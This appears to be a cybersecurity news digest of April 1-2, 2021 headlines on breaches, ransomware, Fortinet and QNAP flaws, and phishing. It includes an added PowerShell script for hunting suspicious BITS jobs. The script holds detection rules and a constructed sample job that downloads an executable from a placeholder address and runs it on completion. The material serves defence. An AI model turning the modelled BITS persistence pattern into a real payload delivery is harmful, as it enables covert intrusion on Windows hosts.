Qualys: Breach limited to 3rd-party vendor, but attackers trying to make exposure seem worse Full Text
Abstract
In a detailed update posted on the Qualys website April 2, CISO Ben Carr said that an independent, third-party forensic firm has verified the company’s initial determination that the attack did not jump from Accellion’s file transfer appliance server to Qualys’ larger corporate network.SCMagazine
April 02, 2021 – Outage
Brown University hit by cyberattack, some systems still offline Full Text
Abstract
Brown University, a private US research university, had to disable systems and cut connections to the data center after suffering a cyberattack on Tuesday.BleepingComputer
April 2, 2021 – Accident
FBI: APTs Actively Exploiting Fortinet VPN Security Holes Full Text
Abstract
Three security vulnerabilities in the Fortinet SSL VPN are being used to gain a foothold within networks before moving laterally and carrying out recon.Threatpost
April 02, 2021 – Breach
GitHub Arctic Vault likely contains leaked MedData patient records Full Text
Abstract
GitHub Arctic Code Vault has likely inadvertently captured sensitive patient medical records from multiple healthcare facilities. The private data was leaked on GitHub repositories last year that are now part of a collection of open-source contributions bound to last 1,000 years.BleepingComputer
April 2, 2021 – Vulnerabilities
TIM’s Red Team Research (RTR) team found 5 zero-day flaws in the CA eHealth Performance Manager product Full Text
Abstract
Researchers from TIM’s Red Team Research discovered five new vulnerabilities affecting the CA eHealth Performance Manager product. Researchers from TIM’s Red Team Research led by Massimiliano Brolli, discovered 5 new vulnerabilities affecting...Security Affairs
April 2, 2021 – APT
APTs targeting Fortinet, CISA and FBI warn Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) and FBI issued a joint advisory Friday that advanced persistent threat groups are scanning for vulnerable Fortinet products. “It is likely that the APT actors are scanning for these vulnerabilities to gain access to multiple government, commercial, and technology services networks,” reads the advisory. The APTs, which CISA…SCMagazine
April 02, 2021 – Ransomware
Asteelflash electronics maker hit by REvil ransomware attack Full Text
Abstract
Asteelflash, a leading French electronics manufacturing services company, has suffered a cyberattack by the REvil ransomware gang, which is demanding a $24 million ransom.BleepingComputer
April 2, 2021 – Malware
Call of Duty Cheats Expose Gamers to Malware, Takeover Full Text
Abstract
Activision is warning that cyberattackers are disguising malware — a remote-access trojan (RAT) — in cheat programs.Threatpost
April 2, 2021 – Vulnerabilities
Tens of thousands of QNAP SOHO NAS devices affected by unpatched RCEs Full Text
Abstract
Unpatched vulnerabilities in QNAP small office/home office (SOHO) network-attached storage (NAS) devices could be exploited by remote attackers to execute arbitrary code. Security researchers at SAM Seamless Network discovered a couple of critical...Security Affairs
April 02, 2021 – Hacker
FBI and CISA warn of state hackers attacking Fortinet FortiOS servers Full Text
Abstract
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) warn of advanced persistent threat (APT) actors targeting Fortinet FortiOS servers using multiple exploits.BleepingComputer
April 02, 2021 – General
Popular Twitch AdBlock shuts down after Twitch breaks extension Full Text
Abstract
The popular Twitch AdBlock extension has been removed from both the Chrome Web Store and Firefox Add-ons. Twitch AdBlock was the extension of choice among Twitch users for restricting ads when using Twitch. The extension's author stated that, before its removal, the ad blocker had over 150,000 users and 6 million daily views.BleepingComputer
April 2, 2021 – Malware
From PowerShell to Payload: An Analysis of Weaponized Malware Full Text
Abstract
John Hammond, security researcher with Huntress, takes a deep-dive into a malware’s technical and coding aspects.Threatpost
April 02, 2021 – Breach
Qualys says Accellion hackers did not breach production systems Full Text
Abstract
Cybersecurity firm Qualys said today that the attackers who breached its Accellion FTA server didn't infiltrate the company's production and corporate environments.BleepingComputer
April 2, 2021 – Policy and Law
Intelligence Analyst Fed Secrets to Reporter Full Text
Abstract
Former intelligence analyst pleads guilty to disclosing classified information to journalistInfosecurity Magazine
April 02, 2021 – Breach
Capital One notifies more clients of SSNs exposed in 2019 data breach Full Text
Abstract
US bank Capital One notified additional customers that their Social Security numbers were exposed in a data breach announced in July 2019.BleepingComputer
April 2, 2021 – General
What Is a Cybersecurity Legal Practice? Full Text
Abstract
Some considerations for companies looking to build out a cybersecurity legal practice.Lawfare
April 2, 2021 – Policy and Law
Troll Fined $81 After Victim Kills Herself Full Text
Abstract
Cyber-bully who asked wrestler “when will you die?” fined after victim takes her own lifeInfosecurity Magazine
April 2, 2021 – Government
Canada’s Defense Strategy Falls Behind in the Quantum Age Full Text
Abstract
Spurred on by recent quantum computing milestones, a global “quantum race” is underway—but Canada is still without a strategy.Lawfare
April 2, 2021 – Outage
Microsoft Suffers Second Outage in Two Weeks Full Text
Abstract
April Fool’s Day cloud outage impacts Azure, Office 365, and TeamsInfosecurity Magazine
April 2, 2021 – Vulnerabilities
Critical QNAP Vulnerabilities Let Attackers Access User Data and Complete Takeover Full Text
Abstract
SAM’s security research team revealed two recently discovered vulnerabilities in a specific kind of NAS device and their potential impacts...Cyber Security News
April 2, 2021 – Ransomware
Conti Ransomware gang demanded $40 million ransom from Broward County Public Schools Full Text
Abstract
The ransomware gang demanded a $40,000,000 ransom from the Broward County Public Schools district, Florida. It is just the latest in a long string of attacks against the sector. Ransomware operators continue to target organizations worldwide and school districts...Security Affairs
April 2, 2021 – Vulnerabilities
Airlift Express Fixes Vulnerabilities in Its E-commerce Store Full Text
Abstract
A team of security researchers from PrivacySavvy recently discovered an OTP vulnerability in Airlift Express, which could lead to account hacks and exploits by cybercriminals.Security Affairs
April 2, 2021 – Phishing
Non-Fungible Tokens: Of Course They’re Attracting Scammers Full Text
Abstract
Since digital ownership of Twitter CEO Jack Dorsey's first tweet sold for $2.9 million, security researchers now expect fraudsters to focus more on non-fungible token aficionados.Gov Info Security
April 02, 2021 – General
Lawmakers urge Education Department to take action to defend schools from cyber threats Full Text
Abstract
Reps. Doris Matsui (D-Calif.) and Jim Langevin (D-R.I.) on Friday urged the Department of Education to prioritize protecting K-12 institutions from cyberattacks, which have shot up in the past year as classes moved increasingly online during the COVID-19 pandemic.The Hill
April 2, 2021 – Phishing
Robinhood Warns Customers of Tax-Season Phishing Scams Full Text
Abstract
Attackers are impersonating the stock-trading broker using fake websites to steal credentials as well as sending emails with malicious tax files.Threatpost
April 2, 2021 – Breach
Leaker Dismisses MobiKwik’s Not-So-Nimble Breach Denial Full Text
Abstract
A broker of breached data claims via a dedicated .onion leak site to have deleted 8TB of stolen MobiKwik customer data that the company denies was stolen. The listing for 8.2TB of stolen data was withdrawn by a cybercrime forum seller.Gov Info Security
April 2, 2021 – Vulnerabilities
Airlift Express Fixes Vulnerabilities in Its E-commerce Store Full Text
Abstract
PrivacySavvy experts discovered an OTP vulnerability in Airlift Express, which could lead to account hacks and exploits by cybercriminals. A team of security researchers from PrivacySavvy recently discovered an OTP vulnerability in Airlift Express,...Security Affairs
April 02, 2021 – Breach
GitHub Arctic Vault likely has leaked MedData patient records Full Text
Abstract
GitHub Arctic Code Vault has likely inadvertently captured sensitive patient medical records from multiple healthcare facilities. The private data was leaked on GitHub repositories last year that are now part of a collection of open-source contributions bound to last 1,000 years.BleepingComputer
April 2, 2021 – Ransomware
Ransomware Declared As a National Security Threat by DHS Full Text
Abstract
In an RSA conference webcast, Alejandro Mayorkas, the U.S. Secretary of Homeland Security, stated that fighting ransomware attacks is now the Department of Homeland Security's number one priority, and a plan to be more proactive is already in place.Tech Target
April 02, 2021 – Ransomware
Ransomware gang wanted $40 million in Florida schools cyberattack Full Text
Abstract
Fueled by large payments from victims, ransomware gangs have started to demand ridiculous ransoms from organizations that cannot afford them. An example of this is a recently revealed ransomware attack on the Broward County Public Schools district where threat actors demanded a $40,000,000 payment.BleepingComputer
April 2, 2021 – Denial Of Service
DDoS Attacks Peaked at 800Gbps Targeting the Gambling and Video Games Industry Full Text
Abstract
According to security services provider Akamai, Distributed Denial of Service (DDoS) attacks are growing bigger in volume, and they have also become...Cyber Security News
April 2, 2021 – Vulnerabilities
Trustwave Uncovers Vulnerability in Popular Website CMS Full Text
Abstract
Privilege escalation issue found on website CMS UmbracoInfosecurity Magazine
April 2, 2021 – Government
DHS CISA requires federal agencies to assess their Microsoft Exchange servers by April 5 Full Text
Abstract
The DHS CISA has issued a supplemental directive that requires all federal agencies to identify vulnerable Microsoft Exchange servers in their infrastructure within five days. The Department of Homeland Security’s Cybersecurity and Infrastructure...Security Affairs
April 02, 2021 – Government
Lack of cyber funds in Biden infrastructure plan raises eyebrows Full Text
Abstract
President Biden's $2.25 trillion infrastructure plan does not include any funds to protect critical infrastructure against cyberattacks, even as the threat grows against targets like the electric grid.The Hill
April 2, 2021 – Malware
Android “System Update” malware steals photos, videos, GPS location Full Text
Abstract
A newly discovered piece of Android malware shares the same capabilities found within many modern stalkerware-type apps—it can swipe images and video, rifle through online searches, record phone calls, and video, and peer into GPS location data.Malwarebytes Labs
April 2, 2021 – Criminals
Cybercriminal hacks vaccine marketplace, makes over $752K Full Text
Abstract
In a bizarre incident, a hacker has taken down a vaccine marketplace being run on the Dark Web, created fake orders, canceled them, and took a refund in Bitcoins worth $752,000.The Times Of India
April 2, 2021 – Government
NIST Publishes Guide for Securing Hotel Property Management Systems Full Text
Abstract
The National Institute of Standards and Technology (NIST) has released a cybersecurity guide for the hospitality industry to help reduce security risks related to hotel property-management system software.Dark Reading
April 2, 2021 – Policy and Law
Dutch watchdog fines Booking.com $560k after it kept customer data thefts quiet for more than 3 weeks Full Text
Abstract
The Netherlands Data Protection Authority has fined Booking.com $560,000 for notifying it too late that criminals had accessed the data of 4,109 people who booked a hotel room via the website.The Register
April 2, 2021 – Breach
Ubiquiti Shares Dive After Reportedly Downplaying ‘Catastrophic’ Data Breach Full Text
Abstract
Shares of New York City-based IoT device maker Ubiquiti (NYSE: UI) fell significantly this week following a report claiming that the recently disclosed data breach was “catastrophic” and that its impact was downplayed.Security Week
April 2, 2021 – Government
After Hack, Officials Draw Attention to Supply Chain Threats Full Text
Abstract
The U.S. government is working to draw attention to supply chain vulnerabilities, an issue that received particular attention late last year after suspected Russian hackers gained access to federal agencies and private corporations.Security Week
April 02, 2021 – Breach
GitHub Arctic Vault captures leaked patient medical data for 1,000 years Full Text
Abstract
GitHub Arctic Code Vault has inadvertently captured sensitive patient medical records from multiple healthcare facilities. The private data was leaked on GitHub repositories last year that are now part of a collection of open-source contributions bound to last 1,000 years.BleepingComputer
April 2, 2021 – Business
Cybersecurity Firm ReliaQuest Announces New Senior Appointments Full Text
Abstract
Kara Wilson and Alex Bender both join the companyInfosecurity Magazine
April 2, 2021 – Policy and Law
Man indicted for tampering with public water system in Kansas Full Text
Abstract
The United States Department of Justice (DoJ) charged a Kansas man for accessing and tampering with a public water system. The United States Department of Justice charged Wyatt A. Travnichek (22), of Ellsworth County, Kansas, for accessing and tampering...Security Affairs
April 2, 2021 – Breach
Mobile providers exposing sensitive data to leakage and theft Full Text
Abstract
Data exposure is a significant, unaddressed problem for Europe’s top mobile providers and, by extension, more than 253 million customers who sign up for their services and share sensitive personal data, according to research by Tala Security.Help Net Security
April 2, 2021 – Business
Wipro acquires Ampion to deliver combined portfolio of transformation offerings Full Text
Abstract
Wipro announced that it has signed an agreement to acquire Ampion, an Australia-based provider of cybersecurity, DevOps, and quality engineering services. Ampion was formed through the merger of IT services providers ‘Revolution IT’ and ‘Shelde’.Help Net Security
April 02, 2021 – Phishing
MacKenzie Scott Grant scam more widespread than initially thought Full Text
Abstract
A massive phishing campaign reaching tens of thousands of inboxes impersonated the MacKenzie Bezos-Scott grant foundation, promising financial benefits to recipients in exchange for a processing fee.BleepingComputer
April 2, 2021 – Hacker
Recent Hancitor Infections Use Cobalt Strike and a Network Ping Tool Full Text
Abstract
As early as October 2020, Hancitor began utilizing Cobalt Strike and some of these infections utilized a network ping tool to enumerate the infected host’s internal network.Palo Alto Networks
April 2, 2021 – Business
Molson Coors Cyberattack, Storms Could Cost Company $140 Million Full Text
Abstract
Known brewing giant Molson Coors said that a disruptive cyberattack, combined with winter storms in Texas, could cost the company upwards of $140 million in short-term EBITDA.Security Week
April 2, 2021 – Hacker
Bahamut Possibly Responsible for Multi-Stage Infection Chain Campaign Full Text
Abstract
Threat researchers discovered cyberthreat actors distributing malicious documents exploiting a vulnerability (CVE-2017-8570) during a multi-stage infection chain to install a Visual Basic (VB) executable on target machines.Anomali
April 2, 2021 – Malware
Beware – Hackers Using Gaming mods and Cheat Engines to Deliver Malware Full Text
Abstract
Cisco Talos recently revealed a new campaign targeting video game players and other PC modders. They detected a new cryptor used in...Cyber Security News
April 01, 2021 – Phishing
US DOJ: Phishing attacks use vaccine surveys to steal personal info Full Text
Abstract
The US Department of Justice warns of phishing attacks using fake post-vaccine surveys to steal money from people or tricking them into handing over their personal information.BleepingComputer
April 1, 2021 – Malware
Fileless Malware Growth Beats All Other Odds in 2020 Full Text
Abstract
According to a report by Watchguard Technologies, in 2020, the use of fileless malware increased rapidly as cybercriminals tried to find new ways to evade traditional security controls.Cyware Alerts - Hacker News
April 01, 2021 – General
Hillicon Valley: Supreme Court rules Facebook text alerts not akin to robocalls | Republicans press Google, Apple, Amazon on Parler removals | Texas Senate blocks social media platforms from banning users based on politics Full Text
Abstract
The Supreme Court issued a unanimous ruling Thursday siding with Facebook over the platform’s notification system to alert users of suspicious logins. Meanwhile, Google, Apple and Amazon received letters from two Republicans questioning the companies’ actions taken against the social media platform Parler. Top tech platforms were also the target of a Texas Senate bill that passed Thursday that aims to block social media platforms from banning residents based on political views.The Hill
April 1, 2021 – Privacy
ACLU Files AI FOIA Request Full Text
Abstract
American Civil Liberties Union requests artificial intelligence documents from national security agenciesInfosecurity Magazine
April 1, 2021 – Vulnerabilities
VMware fixes authentication bypass in Carbon Black Cloud Workload appliance Full Text
Abstract
VMware has addressed a critical authentication bypass vulnerability in the VMware Carbon Black Cloud Workload appliance. VMware has addressed a critical vulnerability, tracked as CVE-2021-21982, in the VMware Carbon Black Cloud Workload appliance...Security Affairs
April 1, 2021 – Phishing
Protecting employees from job offer scams can lead to awkward but important conversations Full Text
Abstract
Employees who are successfully phished with a job offer likely won’t report the incident to their employer, expert says.SCMagazine
April 1, 2021 – General
80% of Global Enterprises Report Firmware Cyberattacks Full Text
Abstract
A vast majority of companies in a global survey from Microsoft report being a victim of a firmware-focused cyberattack, but defense spending lags.Threatpost
April 01, 2021 – General
Coinhive domain repurposed to warn visitors of hacked sites, routers Full Text
Abstract
After taking over the domains for the notorious Coinhive in-browsing Monero mining service, a researcher is now displaying alerts on hacked websites that are still injecting the mining service's JavaScript.BleepingComputer
April 1, 2021 – Ransomware
Hades Ransomware and Hafnium Hacker Group - Peas from the Same Pod? Full Text
Abstract
Researchers surmise that the Hafnium APT group might be operating under the disguise of Hades due to shared IOCs observed in recent attacks.Cyware Alerts - Hacker News
April 1, 2021 – Breach
Forensic Audit of MobiKwik Ordered Full Text
Abstract
Reserve Bank of India orders audit of country's largest mobile payment network after alleged data breachInfosecurity Magazine
April 1, 2021 – Malware
Video game cheat mod malware demonstrates risks of unlicensed software Full Text
Abstract
Hacking campaign trojanizes cheat mods that PC gamers may be downloading and installing on their work computers.SCMagazine
April 01, 2021 – Vulnerabilities
VMware fixes authentication bypass in data center security software Full Text
Abstract
VMware has addressed a critical vulnerability in the VMware Carbon Black Cloud Workload appliance that could allow attackers to bypass authentication after exploiting vulnerable servers.BleepingComputer
April 1, 2021 – General
A Barrage of Cyberattacks Hits the Financial Sector Full Text
Abstract
Most of these attacks were observed in U.S.-based financial institutions, while other impacted regions include Western Asia and Central and Western Europe. Phishing is still a major infection vector.Cyware Alerts - Hacker News
April 1, 2021 – Government
CISA encourages everyone to follow updated guidance for Microsoft Exchange fixes Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday issued a supplemental direction to Emergency Directive (ED) 21-02, which lays out hardening, forensic triage and reporting requirements designed to mitigate vulnerabilities found in the wake of the massive Microsoft Exchange vulnerability hacks that have affected tens of thousands of organizations. The update directs federal departments…SCMagazine
April 1, 2021 – Outage
Brown experiencing IT security threat, temporary system outage Full Text
Abstract
On Tuesday, the IT department sent a letter to the community saying they “became aware of a cybersecurity threat to the University’s Microsoft Windows-based technology infrastructure.”WPRI
April 1, 2021 – Government
Just like cyber became a C-suite issue, it’s also now your governor’s concern Full Text
Abstract
The National Governors Association announced five U.S. states have been selected for its 2021 Policy Academy to Advance Whole-of-State Cybersecurity.SCMagazine
April 1, 2021 – Attack
Website of global parliamentary alliance on China suffers cyber attack Full Text
Abstract
The IPAC's website was down on Monday, after suffering a DDoS attack (distributed denial-of-service), causing the site to slow significantly, The Sydney Morning Herald reported.The Times Of India
April 01, 2021 – Breach
Ubiquiti confirms extortion attempt following security breach Full Text
Abstract
Networking device maker Ubiquiti has confirmed that it was the target of an extortion attempt following a January security breach, as revealed by a whistleblower earlier this week.BleepingComputer
April 1, 2021 – Covid-19
Don’t Share Your COVID-19 Vaccine Card on Social Media – US Govt Warns Full Text
Abstract
The Department of Health and Human Services, Office of Inspector General (HHS-OIG), and the FBI are advising the public to be aware...Cyber Security News
April 1, 2021 – Malware
Activision Reveals Malware Disguised as ‘Call of Duty: Warzone’ Cheats Full Text
Abstract
Activision security researchers found that a Warzone cheat advertised on popular cheating forums was actually malware that let hackers take control of the victims' computers.Motherboard Vice
April 01, 2021 – Policy and Law
DeepDotWeb Admin Pleads Guilty to Money Laundering Charges Full Text
Abstract
The U.S. Department of Justice (DoJ) on Wednesday said that an Israeli national pleaded guilty for his role as an "administrator" of a portal called DeepDotWeb (DDW), a "news" website that "served as a gateway to numerous dark web marketplaces." According to the unsealed court documents, Tal Prihar, 37, an Israeli citizen residing in Brazil, operated DDW alongside Michael Phan, 34, of Israel, starting October 2013, in return for which they received kickbacks from the operators of the marketplaces in the form of virtual currency amounting to 8,155 bitcoins (worth $8.4 million at the time of the transactions). In an attempt to conceal the illicit payments, Prihar is said to have transferred the money to other bitcoin accounts and to bank accounts under his control in the name of shell companies. "Tal Prihar served as a broker for illegal Darknet marketplaces — helping such marketplaces find customers for fentanyl, firearms, and other dangerousThe Hacker News
April 1, 2021 – Policy and Law
DeepDotWeb Administrator Admits Darknet Conspiracy Full Text
Abstract
Website owner made over $8m advertising illegal online marketplacesInfosecurity Magazine
April 1, 2021 – Policy and Law
DeepDotWeb admin pleads guilty to money laundering conspiracy Full Text
Abstract
One of the administrators of the DeepDotWeb dark web portal, Tal Prihar (37), has pleaded guilty to receiving kickbacks from the operators of the marketplaces the site linked to...Security Affairs
April 1, 2021 – Education
Building a Fortress: 3 Key Strategies for Optimized IT Security Full Text
Abstract
Chris Haas, director of information security and research at Automox, discusses how to shore up cybersecurity defenses and what to prioritize.Threatpost
April 01, 2021 – Breach
Ubiquiti cyberattack may be far worse than originally disclosed Full Text
Abstract
The data breach report from Ubiquiti in January is allegedly a cover-up of a massive incident that put at risk customer data and devices deployed on corporate and home networks.BleepingComputer
April 1, 2021 – Government
DHS Secretary Mayorkas Outlines His Vision for Cybersecurity Resilience Full Text
Abstract
The department will conduct a series of 60-day sprints which will mobilize action by elevating existing efforts, removing roadblocks, and launching new initiatives where necessary.DHS
April 01, 2021 – Policy and Law
22-Year-Old Charged With Hacking Water System and Endangering Lives Full Text
Abstract
A 22-year-old man from the U.S. state of Kansas has been indicted on charges that he accessed a public water facility's computer system without authorization, jeopardizing the safety and health of residents in the local community. Wyatt A. Travnichek, 22, of Ellsworth County, Kansas, has been charged with one count of tampering with a public water system and one count of reckless damage to a protected computer during unauthorized access, according to the Department of Justice (DoJ). "By illegally tampering with a public drinking water system, the defendant threatened the safety and health of an entire community," said Lance Ehrig, Special Agent in Charge of the Environmental Protection Agency (EPA) Criminal Investigation Division in Kansas. "EPA and its law enforcement partners are committed to upholding the laws designed to protect our drinking water systems from harm or threat of harm. Today's indictment sends a clear message that individuals who intentionallThe Hacker News
April 1, 2021 – Government
DHS Secretary Outlines Biden Administration’s Cybersecurity Vision Full Text
Abstract
DHS secretary Alejandro Mayorkas spoke during RSAC webcastInfosecurity Magazine
April 1, 2021 – Vulnerabilities
VMware fixed flaws in vROps that can be chained to compromise organizations Full Text
Abstract
VMware addressed two vulnerabilities in its vRealize Operations (vROps) product that, chained together, expose organizations to a significant risk of attack. vROps delivers self-driving IT operations management for private, hybrid, and multi-cloud environments...Security Affairs
April 1, 2021 – General
USB threats to ICS systems have nearly doubled: Report Full Text
Abstract
The latest Honeywell USB Threat Report 2020 indicates that the number of threats specifically targeting Operational Technology systems has nearly doubled from 16% to 28%.Tripwire
April 01, 2021 – Education
How to Vaccinate Against the Poor Password Policy Pandemic Full Text
Abstract
Data breaches remain a constant threat, and no industry or organization is immune from the risks. From Fortune 500 companies to startups, password-related breaches continue to spread seemingly unchecked. As a result of the volume of data breaches and cybersecurity incidents, hackers now have access to a vast swathe of credentials that they can use to power various password-related attacks. One example of this is credential stuffing attacks, which accounted for 1.5 billion incidents in the last quarter of 2020—a staggering 90% increase from Q1 2020. The rapid pivot to digital in response to the pandemic has been a key contributor to the explosive growth in cybersecurity attacks. With organizations shifting more services online and investing in new applications that facilitate virtual interactions with employees and customers, this has changed the security landscape and presented an array of new avenues for hackers to exploit. However, in a rush to move everything online from meeThe Hacker News
April 1, 2021 – Policy and Law
Booking.com Fined $558,000 for Late Breach Notification Full Text
Abstract
Dutch regulator brands 2018 incident a “serious violation”Infosecurity Magazine
April 1, 2021 – Ransomware
Akamai dealt with an 800Gbps ransom DDoS against a gambling company Full Text
Abstract
Akamai was recently involved in mitigating two of the largest known ransom DDoS attacks, one of which peaked at 800Gbps. CDN and cybersecurity firm Akamai warns of a worrying escalation in ransom DDoS attacks since the beginning of the year. The...Security Affairs
April 1, 2021 – Breach
Multiple Healthcare Providers Report Patient Data Breaches in Wake of Netgain Security Incident Full Text
Abstract
Months after an apparent ransomware attack against cloud hosting and MSP Netgain Technology, the list of healthcare entities reporting major health data breaches linked to the incident is growing.Info Risk Today
April 01, 2021 – Vulnerabilities
Hackers Using a Windows OS Feature to Evade Firewall and Gain Persistence Full Text
Abstract
Attackers have been observed abusing Microsoft's Background Intelligent Transfer Service (BITS) to deploy malicious payloads on Windows machines stealthily. In 2020, hospitals, retirement communities, and medical centers bore the brunt of an ever-shifting phishing campaign that distributed custom backdoors such as KEGTAP, which ultimately paved the way for RYUK ransomware attacks. But new research by FireEye's Mandiant cyber forensics arm has now revealed a previously unknown persistence mechanism that shows the adversaries made use of BITS to launch the backdoor. Introduced in Windows XP, BITS is a component of Microsoft Windows that makes use of idle network bandwidth to facilitate the asynchronous transfer of files between machines. This is achieved by creating a job — a container that includes the files to download or upload. BITS is commonly used to deliver operating system updates to clients as well as by Windows Defender antivirusThe Hacker News
April 1, 2021 – Hacker
North Korean Hackers Expand Targeting of Security Community Full Text
Abstract
New fake company and social profiles seek to lure researchersInfosecurity Magazine
April 1, 2021 – Breach
Ubiquiti security breach may be a catastrophe Full Text
Abstract
The data breach disclosed by Ubiquiti in January could be just the tip of the iceberg; a far deeper incident may have hit the company. In January, American technology vendor Ubiquiti Networks suffered a data breach and sent notification emails to its customers...Security Affairs
April 1, 2021 – Phishing
Over 1,600 Fake Twitter Accounts Being Used to Impersonate Major Indonesian Banks Full Text
Abstract
The scam campaign, which involves over 1,600 fake Twitter accounts, targets roughly 2 million Indonesian bank customers, the combined follower count of the banks' legitimate Twitter pages.Security Affairs
April 1, 2021 – General
Half of Global Retailers See Account Takeovers Surge Full Text
Abstract
Ravelin study finds most are increasing fraud budgets this yearInfosecurity Magazine
April 1, 2021 – Vulnerabilities
US CISA warns of DoS flaws in Citrix Hypervisor Full Text
Abstract
Citrix addressed vulnerabilities in Hypervisor that could allow a threat actor with code execution inside a guest virtual machine to trigger a denial-of-service condition on the host. US CISA warns that Citrix has released security updates to address flaws...Security Affairs
April 1, 2021 – Solution
Google Cloud And Deloitte Launch Security Analytics Platform Full Text
Abstract
Google Cloud and Deloitte have launched a new platform for enterprises aimed at helping companies thwart cyberthreats as the global workforce has gone remote and cloud usage has exploded.CRN
April 1, 2021 – General
#LORCALive: Cybersecurity to Play a Key Role in Supporting Growing Space Sector Full Text
Abstract
As the commercial use of space grows, the sector will come under increased threat of attacksInfosecurity Magazine
April 1, 2021 – Hacker
Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service Full Text
Abstract
When malicious applications create BITS jobs, files are downloaded or uploaded in the context of the service host process. This can be used to bypass firewalls that block unknown processes.FireEye
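The two BITS items above (the Hacker News summary and the FireEye abstract) describe the same abuse pattern: a job is created so that the download runs inside the BITS service host rather than the attacker's own process, and a command line registered on the job launches the payload when the transfer completes. The script below is an added triage example written for this digest; it is not code from FireEye/Mandiant, The Hacker News, or Microsoft. It relies only on the documented `Get-BitsTransfer` cmdlet and the `NotifyCmdLine`, `TransferType`, `FileList`, `RemoteName` and `LocalName` properties of its output. The trusted-host allow-list, the user-writable path patterns, and the sample job are assumptions constructed for illustration.

```powershell
# Added example: hunt for suspicious BITS jobs on a Windows host.
# Run from an elevated PowerShell so that -AllUsers also returns jobs owned by SYSTEM.
# The allow-list and heuristics below are assumptions; tune them to your environment
# (add your WSUS/SCCM/CDN hosts before relying on finding #2).

$TrustedHostPatterns = @(
    '\.windowsupdate\.com$',
    '\.microsoft\.com$'
)

function Test-TrustedRemote {
    param([string]$RemoteName)
    try { $uriHost = ([uri]$RemoteName).Host } catch { return $false }
    if (-not $uriHost) { return $false }
    foreach ($pattern in $TrustedHostPatterns) {
        if ($uriHost -match $pattern) { return $true }
    }
    return $false
}

function Get-BitsJobFindings {
    # Accepts BitsJob objects from Get-BitsTransfer (or look-alike objects with the
    # same property names) and emits one finding per suspicious job.
    param([Parameter(ValueFromPipeline = $true)] $Job)
    process {
        $reasons = @()

        # 1. Persistence: a notification command line is executed by BITS when the job
        #    finishes or errors. Windows Update does not set one; attackers do.
        if ($Job.NotifyCmdLine -and ($Job.NotifyCmdLine -join '').Trim()) {
            $reasons += "NotifyCmdLine set: $($Job.NotifyCmdLine -join ' ')"
        }

        foreach ($file in @($Job.FileList)) {
            # 2. Remote side not on the allow-list. The transfer is performed by
            #    svchost.exe, so a host-firewall rule keyed on the process name of
            #    the malware never sees this traffic.
            if (-not (Test-TrustedRemote $file.RemoteName)) {
                $reasons += "Untrusted remote: $($file.RemoteName)"
            }
            # 3. Executable content landing in a user-writable location.
            if ($file.LocalName -match '\\(AppData|Temp|ProgramData|Public)\\' -and
                $file.LocalName -match '\.(exe|dll|ps1|bat|vbs|js|hta|scr)$') {
                $reasons += "Executable written to user-writable path: $($file.LocalName)"
            }
        }

        # 4. Upload jobs are unusual for patching and are how data leaves over BITS.
        if ("$($Job.TransferType)" -match '^Upload') {
            $reasons += "Upload job ($($Job.TransferType))"
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                JobId       = $Job.JobId
                DisplayName = $Job.DisplayName
                Owner       = $Job.OwnerAccount
                State       = $Job.JobState
                Created     = $Job.CreationTime
                Reasons     = $reasons
            }
        }
    }
}

# Constructed sample (not real telemetry) shaped like the reported pattern: a download
# from an unknown host into ProgramData, plus a command to run once it lands.
$sampleJob = [pscustomobject]@{
    JobId         = '00000000-0000-0000-0000-000000000001'
    DisplayName   = 'Microsoft Edge Update'          # look-alike display name
    OwnerAccount  = 'NT AUTHORITY\SYSTEM'
    JobState      = 'Transferred'
    TransferType  = 'Download'
    CreationTime  = Get-Date
    NotifyCmdLine = @('C:\ProgramData\update\svc.exe', '')
    FileList      = @([pscustomobject]@{
        RemoteName = 'http://203.0.113.10/u/svc.dat'   # TEST-NET-3 address, constructed
        LocalName  = 'C:\ProgramData\update\svc.exe'
    })
}
$sampleJob | Get-BitsJobFindings | Format-List

# Live triage on the host (elevated shell):
# Get-BitsTransfer -AllUsers | Get-BitsJobFindings | Format-List
```

For hosts where the PowerShell module is unavailable, `bitsadmin /list /allusers /verbose` prints the same job fields (including the notification command line) and can be parsed with the same rules. Because BITS jobs survive reboots and retry for days by default, a job that has already transferred its file and has a notification command set is worth treating as an active persistence mechanism rather than a stale artifact.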
April 1, 2021 – Vulnerabilities
Chinese Researchers Earn Another $20,000 for Chrome Sandbox Escape Full Text
Abstract
Tracked as CVE-2021-21194, it can be exploited to escape the Chrome sandbox. In combination with a renderer bug, it can allow an attacker to remotely execute arbitrary code outside the Chrome sandbox.Security Week